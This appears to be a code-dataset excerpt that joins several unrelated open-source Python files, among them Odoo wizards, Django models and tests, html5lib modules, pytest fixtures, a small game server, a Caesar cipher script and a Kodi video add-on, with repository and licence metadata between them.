idea_pool = self.pool.get('idea.idea')
comment_pool = self.pool.get('idea.comment')
for do_vote_obj in self.read(cr, uid, ids, context=context):
score = str(do_vote_obj['vote'])
comment = do_vote_obj.get('note', False)
vote = {
'idea_id': idea_id,
'user_id': uid,
'score': score
}
if comment:
comment = {
'user_id':uid,
'idea_id':idea_id,
'content': comment,
}
comment = comment_pool.create(cr, uid, comment)
idea_pool._vote_save(cr, uid, idea_id, None, score, context)
#vote = vote_pool.create(cr, uid, vote)
return {'type': 'ir.actions.act_window_close'}
idea_post_vote()
class idea_select(osv.osv_memory):
""" Select idea for vote."""
_name = "idea.select"
_description = "select idea"
_columns = {
'idea_id': fields.many2one('idea.idea', 'Idea', required=True),
}
def open_vote(self, cr, uid, ids, context=None):
"""
This function load column.
@param cr: the current row, from the database cursor,
@param uid: the current users ID for security checks,
@param ids: List of load column,
@return: dictionary of query logs clear message window
"""
if context is None:
context = {}
idea_obj = self.browse(cr, uid, ids, context=context)
for idea in idea_obj:
idea_id = idea.idea_id.id
data_obj = self.pool.get('ir.model.data')
id2 = data_obj._get_id(cr, uid, 'idea', 'view_idea_post_vote')
if id2:
id2 = data_obj.browse(cr, uid, id2, context=context).res_id
value = {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'idea.post.vote',
'views': [(id2, 'form'), (False, 'tree'), (False, 'calendar'), (False, 'graph')],
'type': 'ir.actions.act_window',
'target': 'new',
'context': {'idea_ids': [idea_id]}
}
return value
idea_select()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
jayceyxc/hue
|
desktop/core/ext-py/Django-1.6.10/django/contrib/webdesign/tests.py
|
232
|
1092
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
from django.contrib.webdesign.lorem_ipsum import *
from django.template import loader, Context
class WebdesignTest(unittest.TestCase):
def test_words(self):
self.assertEqual(words(7), 'lorem ipsum dolor sit amet consectetur adipisicing')
def test_paragraphs(self):
self.assertEqual(paragraphs(1),
['Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'])
def test_lorem_tag(self):
t = loader.get_template_from_string("{% load webdesign %}{% lorem 3 w %}")
self.assertEqual(t.render(Context({})),
'lorem ipsum dolor')
|
apache-2.0
|
Tranzystorek/servo
|
tests/wpt/web-platform-tests/tools/html5lib/setup.py
|
418
|
1694
|
from distutils.core import setup
import os
import codecs
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Text Processing :: Markup :: HTML'
]
packages = ['html5lib'] + ['html5lib.'+name
for name in os.listdir(os.path.join('html5lib'))
if os.path.isdir(os.path.join('html5lib', name)) and
not name.startswith('.') and name != 'tests']
current_dir = os.path.dirname(__file__)
with codecs.open(os.path.join(current_dir, 'README.rst'), 'r', 'utf8') as readme_file:
with codecs.open(os.path.join(current_dir, 'CHANGES.rst'), 'r', 'utf8') as changes_file:
long_description = readme_file.read() + '\n' + changes_file.read()
setup(name='html5lib',
version='0.9999-dev',
url='https://github.com/html5lib/html5lib-python',
license="MIT License",
description='HTML parser based on the WHATWG HTML specifcation',
long_description=long_description,
classifiers=classifiers,
maintainer='James Graham',
maintainer_email='james@hoppipolla.co.uk',
packages=packages,
install_requires=[
'six',
],
)
|
mpl-2.0
|
alphagov/notifications-api
|
migrations/versions/0321_drop_postage_constraints.py
|
1
|
2423
|
"""
Revision ID: 0321_drop_postage_constraints
Revises: 0320_optimise_notifications
Create Date: 2020-06-08 11:48:53.315768
"""
import os
from alembic import op
revision = '0321_drop_postage_constraints'
down_revision = '0320_optimise_notifications'
environment = os.environ['NOTIFY_ENVIRONMENT']
def upgrade():
if environment not in ["live", "production"]:
op.execute('ALTER TABLE notifications DROP CONSTRAINT IF EXISTS chk_notifications_postage_null')
op.execute('ALTER TABLE notification_history DROP CONSTRAINT IF EXISTS chk_notification_history_postage_null')
op.execute('ALTER TABLE templates DROP CONSTRAINT IF EXISTS chk_templates_postage')
op.execute('ALTER TABLE templates_history DROP CONSTRAINT IF EXISTS chk_templates_history_postage')
def downgrade():
# The downgrade command must not be run in production - it will lock the tables for a long time
if environment not in ["live", "production"]:
op.execute("""
ALTER TABLE notifications ADD CONSTRAINT "chk_notifications_postage_null"
CHECK (
CASE WHEN notification_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
op.execute("""
ALTER TABLE notification_history ADD CONSTRAINT "chk_notification_history_postage_null"
CHECK (
CASE WHEN notification_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
op.execute("""
ALTER TABLE templates ADD CONSTRAINT "chk_templates_postage"
CHECK (
CASE WHEN template_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
op.execute("""
ALTER TABLE templates_history ADD CONSTRAINT "chk_templates_history_postage"
CHECK (
CASE WHEN template_type = 'letter' THEN
postage is not null and postage in ('first', 'second')
ELSE
postage is null
END
)
""")
|
mit
|
int19h/PTVS
|
Python/Product/Miniconda/Miniconda3-x64/Lib/ctypes/macholib/dylib.py
|
320
|
1828
|
"""
Generic dylib path manipulation
"""
import re
__all__ = ['dylib_info']
DYLIB_RE = re.compile(r"""(?x)
(?P<location>^.*)(?:^|/)
(?P<name>
(?P<shortname>\w+?)
(?:\.(?P<version>[^._]+))?
(?:_(?P<suffix>[^._]+))?
\.dylib$
)
""")
def dylib_info(filename):
"""
A dylib name can take one of the following four forms:
Location/Name.SomeVersion_Suffix.dylib
Location/Name.SomeVersion.dylib
Location/Name_Suffix.dylib
Location/Name.dylib
returns None if not found or a mapping equivalent to:
dict(
location='Location',
name='Name.SomeVersion_Suffix.dylib',
shortname='Name',
version='SomeVersion',
suffix='Suffix',
)
Note that SomeVersion and Suffix are optional and may be None
if not present.
"""
is_dylib = DYLIB_RE.match(filename)
if not is_dylib:
return None
return is_dylib.groupdict()
def test_dylib_info():
def d(location=None, name=None, shortname=None, version=None, suffix=None):
return dict(
location=location,
name=name,
shortname=shortname,
version=version,
suffix=suffix
)
assert dylib_info('completely/invalid') is None
assert dylib_info('completely/invalide_debug') is None
assert dylib_info('P/Foo.dylib') == d('P', 'Foo.dylib', 'Foo')
assert dylib_info('P/Foo_debug.dylib') == d('P', 'Foo_debug.dylib', 'Foo', suffix='debug')
assert dylib_info('P/Foo.A.dylib') == d('P', 'Foo.A.dylib', 'Foo', 'A')
assert dylib_info('P/Foo_debug.A.dylib') == d('P', 'Foo_debug.A.dylib', 'Foo_debug', 'A')
assert dylib_info('P/Foo.A_debug.dylib') == d('P', 'Foo.A_debug.dylib', 'Foo', 'A', 'debug')
if __name__ == '__main__':
test_dylib_info()
|
apache-2.0
|
ARG-TLQ/Red-DiscordBot
|
redbot/pytest/core.py
|
4
|
3759
|
import random
from collections import namedtuple
from pathlib import Path
import weakref
import pytest
from redbot.core import Config
from redbot.core.bot import Red
from redbot.core import config as config_module, drivers
__all__ = [
"override_data_path",
"coroutine",
"driver",
"config",
"config_fr",
"red",
"guild_factory",
"empty_guild",
"empty_channel",
"empty_member",
"empty_message",
"empty_role",
"empty_user",
"member_factory",
"user_factory",
"ctx",
]
@pytest.fixture(autouse=True)
def override_data_path(tmpdir):
from redbot.core import data_manager
data_manager.basic_config = data_manager.basic_config_default
data_manager.basic_config["DATA_PATH"] = str(tmpdir)
@pytest.fixture()
def coroutine():
async def some_coro(*args, **kwargs):
return args, kwargs
return some_coro
@pytest.fixture()
def driver(tmpdir_factory):
import uuid
rand = str(uuid.uuid4())
path = Path(str(tmpdir_factory.mktemp(rand)))
return drivers.get_driver("PyTest", str(random.randint(1, 999999)), data_path_override=path)
@pytest.fixture()
def config(driver):
config_module._config_cache = weakref.WeakValueDictionary()
conf = Config(cog_name="PyTest", unique_identifier=driver.unique_cog_identifier, driver=driver)
yield conf
@pytest.fixture()
def config_fr(driver):
"""
Mocked config object with force_register enabled.
"""
config_module._config_cache = weakref.WeakValueDictionary()
conf = Config(
cog_name="PyTest",
unique_identifier=driver.unique_cog_identifier,
driver=driver,
force_registration=True,
)
yield conf
# region Dpy Mocks
@pytest.fixture()
def guild_factory():
mock_guild = namedtuple("Guild", "id members")
class GuildFactory:
def get(self):
return mock_guild(random.randint(1, 999999999), [])
return GuildFactory()
@pytest.fixture()
def empty_guild(guild_factory):
return guild_factory.get()
@pytest.fixture(scope="module")
def empty_channel():
mock_channel = namedtuple("Channel", "id")
return mock_channel(random.randint(1, 999999999))
@pytest.fixture(scope="module")
def empty_role():
mock_role = namedtuple("Role", "id")
return mock_role(random.randint(1, 999999999))
@pytest.fixture()
def member_factory(guild_factory):
mock_member = namedtuple("Member", "id guild display_name")
class MemberFactory:
def get(self):
return mock_member(random.randint(1, 999999999), guild_factory.get(), "Testing_Name")
return MemberFactory()
@pytest.fixture()
def empty_member(member_factory):
return member_factory.get()
@pytest.fixture()
def user_factory():
mock_user = namedtuple("User", "id")
class UserFactory:
def get(self):
return mock_user(random.randint(1, 999999999))
return UserFactory()
@pytest.fixture()
def empty_user(user_factory):
return user_factory.get()
@pytest.fixture(scope="module")
def empty_message():
mock_msg = namedtuple("Message", "content")
return mock_msg("No content.")
@pytest.fixture()
def ctx(empty_member, empty_channel, red):
mock_ctx = namedtuple("Context", "author guild channel message bot")
return mock_ctx(empty_member, empty_member.guild, empty_channel, empty_message, red)
# endregion
# region Red Mock
@pytest.fixture()
def red(config_fr):
from redbot.core.cli import parse_cli_flags
cli_flags = parse_cli_flags(["ignore_me"])
description = "Red v3 - Alpha"
Config.get_core_conf = lambda *args, **kwargs: config_fr
red = Red(cli_flags=cli_flags, description=description, dm_help=None, owner_ids=set())
yield red
# endregion
|
gpl-3.0
|
fin/memorial-page
|
mysite/receivers.py
|
43
|
1348
|
from django.dispatch import receiver
from account.signals import password_changed
from account.signals import user_sign_up_attempt, user_signed_up
from account.signals import user_login_attempt, user_logged_in
from pinax.eventlog.models import log
@receiver(user_logged_in)
def handle_user_logged_in(sender, **kwargs):
log(
user=kwargs.get("user"),
action="USER_LOGGED_IN",
extra={}
)
@receiver(password_changed)
def handle_password_changed(sender, **kwargs):
log(
user=kwargs.get("user"),
action="PASSWORD_CHANGED",
extra={}
)
@receiver(user_login_attempt)
def handle_user_login_attempt(sender, **kwargs):
log(
user=None,
action="LOGIN_ATTEMPTED",
extra={
"username": kwargs.get("username"),
"result": kwargs.get("result")
}
)
@receiver(user_sign_up_attempt)
def handle_user_sign_up_attempt(sender, **kwargs):
log(
user=None,
action="SIGNUP_ATTEMPTED",
extra={
"username": kwargs.get("username"),
"email": kwargs.get("email"),
"result": kwargs.get("result")
}
)
@receiver(user_signed_up)
def handle_user_signed_up(sender, **kwargs):
log(
user=kwargs.get("user"),
action="USER_SIGNED_UP",
extra={}
)
|
mit
|
reidyd/legume
|
examples/bounceball/server.py
|
2
|
4144
|
#!/usr/bin/env python
import time
import legume
import shared
import random
class ServerBall(shared.Ball):
BALL_ID = 0
def __init__(self, env):
shared.Ball.__init__(self, env)
self.x = random.randint(0, shared.ZONE_WIDTH)
self.y = random.randint(0, shared.ZONE_HEIGHT)
self.vx = random.randint(-200, 200)
self.vy = random.randint(-200, 200)
self.ball_id = ServerBall.BALL_ID
ServerBall.BALL_ID += 1
def calculate_ahead(self):
nb = ServerBall(self.env)
nb.x = (self.x + self.vx)
nb.y = (self.y + self.vy)
nb.vx = (self.vx)
nb.vy = (self.vy)
nb.frame_number
return nb
def update(self):
self.x += self.vx
self.y += self.vy
if self.x > shared.ZONE_WIDTH or self.x < 0: self.vx = -self.vx
if self.y > shared.ZONE_HEIGHT or self.y < 0: self.vy = -self.vy
def get_message(self, calculate_ahead=True):
message = shared.BallUpdate()
message.ball_id.value = self.ball_id
if calculate_ahead:
nb = self.calculate_ahead()
else:
nb = self
message.x.value = nb.x
message.y.value = nb.y
message.vx.value = nb.vx
message.vy.value = nb.vy
if calculate_ahead:
message.frame_number.value = nb.frame_number + 1
else:
message.frame_number.value = nb.frame_number
return message
class BallServer(shared.BallEnvironment):
def __init__(self):
shared.BallEnvironment.__init__(self)
self._server = legume.Server()
self._server.OnConnectRequest += self.join_request_handler
self._server.OnMessage += self.message_handler
self._update_timer = time.time()
self.checkup_timer = time.time()
self.checkup_framecount = 0
def message_handler(self, sender, message):
if message.MessageTypeID == shared.CreateBallCommand.MessageTypeID:
self.spawn_ball((message.x.value, message.y.value))
def join_request_handler(self, sender, args):
self.send_initial_state(sender)
def _send_update(self):
self.send_updates(self._server)
def go(self):
self._server.listen(('', shared.PORT))
print('Listening on port %d' % shared.PORT)
for x in range(1):
self.spawn_ball()
while True:
# Physics stuff
self._update_balls()
if time.time()-self.checkup_timer >= 3.0:
print('Frames:', self.frame_number - self.checkup_framecount,)
print('Time:', time.time() - self.checkup_timer)
self.checkup_timer = time.time()
self.checkup_framecount = self.frame_number
# Network stuff
if time.time() > self._update_timer + shared.UPDATE_RATE:
self._send_update()
self._update_timer = time.time()
self._server.update()
time.sleep(0.0001)
def spawn_ball(self, position=None):
if position is None:
new_ball = ServerBall(self)
self.insert_ball(new_ball)
else:
new_ball = ServerBall(self)
new_ball.x = position[0]
new_ball.y = position[1]
self.insert_ball(new_ball)
print('Spawning ball with ID %s %s' % (new_ball.ball_id, new_ball.debug()))
def send_updates(self, server):
for ball in self._balls.itervalues():
logging.debug('**** sending update for ball # %s' % ball.ball_id)
print('Sending update for ball # %s' % ball.ball_id)
server.send_reliable_message_to_all(ball.get_message())
def send_initial_state(self, endpoint):
for ball in self._balls.itervalues():
endpoint.send_message(ball.get_message(False))
def main():
server = BallServer()
server.go()
if __name__ == '__main__':
import logging
logging.basicConfig(filename='server.log', level=logging.DEBUG,
filemode="w",
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
main()
|
bsd-3-clause
|
jayc0b0/Projects
|
Python/Security/caesarCypher.py
|
1
|
1545
|
# Jacob Orner (jayc0b0)
# Caesar Cypher script
def main():
# Declare variables and take input
global alphabet
alphabet = ['a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l',
'm', 'n', 'o', 'p', 'q', 'r',
's', 't', 'u', 'v', 'w', 'x',
'y', 'z']
global messageArray
messageArray = []
choice = int(input("Enter 1 to encode. 2 to decode.\n>> "))
if choice == 1:
encode()
elif choice == 2:
pass # Implement decode() and add here
else:
print "Invalid choice"
main()
def encode():
message = raw_input("Enter a string to encode (letters only):\n>> ")
cypherShift = int(input("Enter an integer from 1-25 for the shift:\n>> "))
# Verify input
if not message.isalpha():
print "Please enter only letters into your message."
main()
else:
pass
if cypherShift < 1 or cypherShift > 25:
print "Invalid number. Please enter a valid shift value."
main()
else:
pass
# Break string into an array of letters and shift
messageArray = list(message)
for letter in messageArray:
if alphabet.index(letter) + cypherShift < 25:
messageArray[letter] = alphabet[alphabet.index(letter) + cypherShift]
else:
letter = alphabet[(alphabet.index(letter) + cypherShift) % 25]
# Output cyphered text
message = " ".join(messageArray)
print "Your cyphered message is:"
print message
main()
|
mit
|
jiachenning/odoo
|
addons/account_cancel/__init__.py
|
702
|
1046
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
denismakogon/pyvcloud
|
tests/vca_type_tests.py
|
3
|
2884
|
from nose.tools import with_setup
from testconfig import config
from pyvcloud import vcloudair
from pyvcloud.vcloudair import VCA
class TestVCAType:
def test_0001(self):
"""Identify vCloud Director Standalone"""
vca = VCA(host='https://p1v21-vcd.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type == VCA.VCA_SERVICE_TYPE_STANDALONE
def test_0002(self):
"""Identify vchs is not vCloud Director Standalone"""
vca = VCA(host='https://vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_STANDALONE
def test_0003(self):
"""Identify vca is not vCloud Director Standalone"""
vca = VCA(host='https://vca.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_STANDALONE
def test_0011(self):
"""Identify vCloud Air vchs"""
vca = VCA(host='https://vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type == VCA.VCA_SERVICE_TYPE_VCHS
def test_0012(self):
"""Identify vca is not vCloud Air vchs"""
vca = VCA(host='https://vca.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCHS
def test_0013(self):
"""Identify standalone is not vCloud Air vchs"""
vca = VCA(host='https://p1v21-vcd.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCHS
def test_0021(self):
"""Identify vCloud Air vca"""
vca = VCA(host='https://iam.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type == VCA.VCA_SERVICE_TYPE_VCA
def test_0022(self):
"""Identify vchs is not vCloud Air vca"""
vca = VCA(host='https://vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCA
def test_0023(self):
"""Identify standalone is not vCloud Air vca"""
vca = VCA(host='https://p1v21-vcd.vchs.vmware.com', username='', verify=True, log=True)
assert vca is not None
service_type = vca.get_service_type()
assert service_type != VCA.VCA_SERVICE_TYPE_VCA
|
apache-2.0
|
chenc10/Spark-PAF
|
python/pyspark/traceback_utils.py
|
160
|
2679
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import namedtuple
import os
import traceback
CallSite = namedtuple("CallSite", "function file linenum")
def first_spark_call():
"""
Return a CallSite representing the first Spark call in the current call stack.
"""
tb = traceback.extract_stack()
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return CallSite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame - 1]
return CallSite(function=sfun, file=ufile, linenum=uline)
class SCCallSiteSync(object):
"""
Helper for setting the spark context call site.
Example usage:
from pyspark.context import SCCallSiteSync
with SCCallSiteSync(<relevant SparkContext>) as css:
<a Spark call>
"""
_spark_stack_depth = 0
def __init__(self, sc):
call_site = first_spark_call()
if call_site is not None:
self._call_site = "%s at %s:%s" % (
call_site.function, call_site.file, call_site.linenum)
else:
self._call_site = "Error! Could not extract traceback info"
self._context = sc
def __enter__(self):
if SCCallSiteSync._spark_stack_depth == 0:
self._context._jsc.setCallSite(self._call_site)
SCCallSiteSync._spark_stack_depth += 1
def __exit__(self, type, value, tb):
SCCallSiteSync._spark_stack_depth -= 1
if SCCallSiteSync._spark_stack_depth == 0:
self._context._jsc.setCallSite(None)
|
apache-2.0
|
chrispitzer/toucan-sam
|
toucansam/core/models.py
|
1
|
5910
|
import re
from urlparse import urlparse, parse_qs
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.core.validators import MinValueValidator, MaxValueValidator
from django.db import models
from django.utils.safestring import mark_safe
from durationfield.db.models.fields.duration import DurationField
class ActiveSongsManager(models.Manager):
def get_query_set(self):
qs = super(ActiveSongsManager, self).get_query_set()
qs = qs.filter(active=True)
return qs
class Song(models.Model):
title = models.CharField(max_length=255, blank=True)
short_title = models.CharField(max_length=30, blank=True)
artist = models.CharField(max_length=255, blank=True)
key = models.CharField(max_length=25, blank=True)
singers = models.CharField(max_length=255, blank=True)
cheat_sheet = models.CharField(max_length=255, blank=True)
lyrics_with_chords = models.TextField(blank=True)
video_link = models.URLField(max_length=255, blank=True)
run_time = DurationField(default=2*60*1000000) # default: two minutes
difficulty = models.IntegerField(default=3,
choices=(
(1, 'Real Easy'),
(2, 'Easy'),
(3, 'Normal'),
(4, 'Hard'),
(5, 'Real Hard'),
),
validators=[
MinValueValidator(1),
MaxValueValidator(5),
])
proposed = models.BooleanField(default=True)
active = models.BooleanField(default=True)
objects = models.Manager()
active_objects = ActiveSongsManager()
def save(self, *args, **kwargs):
if not self.short_title and self.title:
self.short_title = self.title[-30:]
super(Song, self).save(*args, **kwargs)
@property
def milliseconds(self):
return self.run_time.total_seconds() * 1000
@property
def column_width(self):
return reduce(lambda a, b: max(a, len(b)), re.split("[\r\n]+", self.lyrics_with_chords), 0)
@property
def lyrics_formatted(self):
"""
Assumes that lyrics with chords interleaves lines with chords and lines with lyrics
"""
def tokenize(s):
return re.split(r'(\w+)', s)
def chordify(chord, cssclass="chord"):
return '<span class="{}">{}</span>'.format(cssclass, chord)
def lineify(line):
return u"<p>{}</p>".format(line)
output = []
chord_line = None
chord_regex = re.compile(r"^(\W*[ABCDEFG]b?(m|min|maj|maj)?\d*\W*)+$", flags=re.IGNORECASE)
for line in re.split("[\r\n]+", self.lyrics_with_chords):
line = line.rstrip()
if chord_regex.match(line):
if chord_line:
formatted_line = ""
for chord in tokenize(chord_line):
if re.match("\W", chord):
formatted_line += chord
else:
formatted_line += chordify(chord, cssclass="chord inline")
output.append(lineify(formatted_line))
chord_line = line
continue
if chord_line:
formatted_line = ""
#make sure line is as long as chords
line = line.ljust(len(chord_line))
#replace spaces at the beginning & end of the line with -- but not the middle!
frontspaces, line, endspaces = re.split(r"(\S[\s\S]*\S|\S)", line)
space = ' '
line = [space]*len(frontspaces) + list(line) + [space]*len(endspaces)
chords = tokenize(chord_line)
for chord in chords:
l = len(chord)
if not (chord+" ").isspace():
formatted_line += chordify(chord)
formatted_line += "".join(line[:l])
line = line[l:]
line = formatted_line + "".join(line)
chord_line = None
output.append(lineify(line))
return mark_safe(u"\n".join(output)) # todo: sanitize input
def has_no_lyrics(self):
return len(self.lyrics_with_chords) < 50
def youtube_video_id(self):
try:
parsed = urlparse(self.video_link)
if parsed.netloc.endswith('youtube.com'):
query = parse_qs(parsed.query)
return query.get('v', [None])[0]
except:
return None
def __unicode__(self):
return self.title
def get_absolute_url(self):
return reverse('song', args=[self.id])
class Meta:
ordering = ["title"]
class Gig(models.Model):
name = models.CharField(max_length=255)
date = models.DateTimeField(null=True)
def __unicode__(self):
return self.name or "undefined"
class SetItem(models.Model):
song = models.ForeignKey(Song, related_name='setitems')
set_list = models.ForeignKey("SetList", related_name='setitems')
order = models.IntegerField()
class SetList(models.Model):
gig = models.ForeignKey(Gig)
songs = models.ManyToManyField(Song, related_name="set_lists", through=SetItem)
show_proposed = models.BooleanField(default=False)
@property
def name(self):
return self.gig.name
@property
def ordered_songs(self):
return self.songs.order_by('setitems__order')
@property
def run_time(self):
microseconds = int(self.songs.aggregate(s=models.Sum('run_time'))['s'])
return timedelta(microseconds=microseconds)
def __unicode__(self):
return self.name or "undefined"
|
gpl-2.0
|
aldariz/Sick-Beard
|
lib/html5lib/treewalkers/etree.py
|
98
|
4817
|
import gettext
_ = gettext.gettext
try:
from types import ModuleType
except:
from new import module as ModuleType
import copy
import re
import _base
from html5lib.constants import voidElements
tag_regexp = re.compile("{([^}]*)}(.*)")
moduleCache = {}
def getETreeModule(ElementTreeImplementation):
name = "_" + ElementTreeImplementation.__name__+"builder"
if name in moduleCache:
return moduleCache[name]
else:
mod = ModuleType("_" + ElementTreeImplementation.__name__+"builder")
objs = getETreeBuilder(ElementTreeImplementation)
mod.__dict__.update(objs)
moduleCache[name] = mod
return mod
def getETreeBuilder(ElementTreeImplementation):
ElementTree = ElementTreeImplementation
class TreeWalker(_base.NonRecursiveTreeWalker):
"""Given the particular ElementTree representation, this implementation,
to avoid using recursion, returns "nodes" as tuples with the following
content:
1. The current element
2. The index of the element relative to its parent
3. A stack of ancestor elements
4. A flag "text", "tail" or None to indicate if the current node is a
text node; either the text or tail of the current element (1)
"""
def getNodeDetails(self, node):
if isinstance(node, tuple): # It might be the root Element
elt, key, parents, flag = node
if flag in ("text", "tail"):
return _base.TEXT, getattr(elt, flag)
else:
node = elt
if not(hasattr(node, "tag")):
node = node.getroot()
if node.tag in ("<DOCUMENT_ROOT>", "<DOCUMENT_FRAGMENT>"):
return (_base.DOCUMENT,)
elif node.tag == "<!DOCTYPE>":
return (_base.DOCTYPE, node.text,
node.get("publicId"), node.get("systemId"))
elif node.tag == ElementTree.Comment:
return _base.COMMENT, node.text
else:
assert type(node.tag) in (str, unicode), type(node.tag)
#This is assumed to be an ordinary element
match = tag_regexp.match(node.tag)
if match:
namespace, tag = match.groups()
else:
namespace = None
tag = node.tag
attrs = {}
for name, value in node.attrib.items():
match = tag_regexp.match(name)
if match:
attrs[(match.group(1),match.group(2))] = value
else:
attrs[(None,name)] = value
return (_base.ELEMENT, namespace, tag,
attrs, len(node) or node.text)
def getFirstChild(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
element, key, parents, flag = node, None, [], None
if flag in ("text", "tail"):
return None
else:
if element.text:
return element, key, parents, "text"
elif len(element):
parents.append(element)
return element[0], 0, parents, None
else:
return None
def getNextSibling(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
return None
if flag == "text":
if len(element):
parents.append(element)
return element[0], 0, parents, None
else:
return None
else:
if element.tail and flag != "tail":
return element, key, parents, "tail"
elif key < len(parents[-1]) - 1:
return parents[-1][key+1], key+1, parents, None
else:
return None
def getParentNode(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
return None
if flag == "text":
if not parents:
return element
else:
return element, key, parents, None
else:
parent = parents.pop()
if not parents:
return parent
else:
return parent, list(parents[-1]).index(parent), parents, None
return locals()
|
gpl-3.0
|
yangqian/plugin.video.pandatv
|
addon.py
|
1
|
4342
|
# -*- coding: utf-8 -*-
# Module: default
# Author: Yangqian
# Created on: 25.12.2015
# License: GPL v.3 https://www.gnu.org/copyleft/gpl.html
# Largely following the example at
# https://github.com/romanvm/plugin.video.example/blob/master/main.py
import xbmc,xbmcgui,urllib2,re,xbmcplugin
from BeautifulSoup import BeautifulSoup
from urlparse import parse_qsl
import sys
import json
# Get the plugin url in plugin:// notation.
_url=sys.argv[0]
# Get the plugin handle as an integer number.
_handle=int(sys.argv[1])
def list_categories():
f=urllib2.urlopen('http://www.panda.tv/cate')
rr=BeautifulSoup(f.read())
catel=rr.findAll('li',{'class':'category-list-item'})
rrr=[(x.a['class'], x.a['title']) for x in catel]
listing=[]
for classname,text in rrr:
img=rr.find('img',{'alt':text})['src']
list_item=xbmcgui.ListItem(label=text,thumbnailImage=img)
list_item.setProperty('fanart_image',img)
url='{0}?action=listing&category={1}'.format(_url,classname)
is_folder=True
listing.append((url,list_item,is_folder))
xbmcplugin.addDirectoryItems(_handle,listing,len(listing))
#xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
f=urllib2.urlopen('http://www.panda.tv/cate/'+category)
rr=BeautifulSoup(f.read())
videol=rr.findAll('a',{'class':'video-list-item-inner'})
rrr=[(x['href'][1:],x.img,x.findNextSibling('div',{'class':'live-info'})) for x in videol]
listing=[]
for roomid,image,liveinfo in rrr:
img=image['src']
roomname=image['alt']
nickname=liveinfo.find('span',{'class':'nick-name'}).text
peoplenumber=liveinfo.find('span',{'class':'people-number'}).text
combinedname=u'{0}:{1}:{2}'.format(nickname,roomname,peoplenumber)
list_item=xbmcgui.ListItem(label=combinedname,thumbnailImage=img)
list_item.setProperty('fanart_image',img)
url='{0}?action=play&video={1}'.format(_url,roomid)
is_folder=False
listing.append((url,list_item,is_folder))
xbmcplugin.addDirectoryItems(_handle,listing,len(listing))
#xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
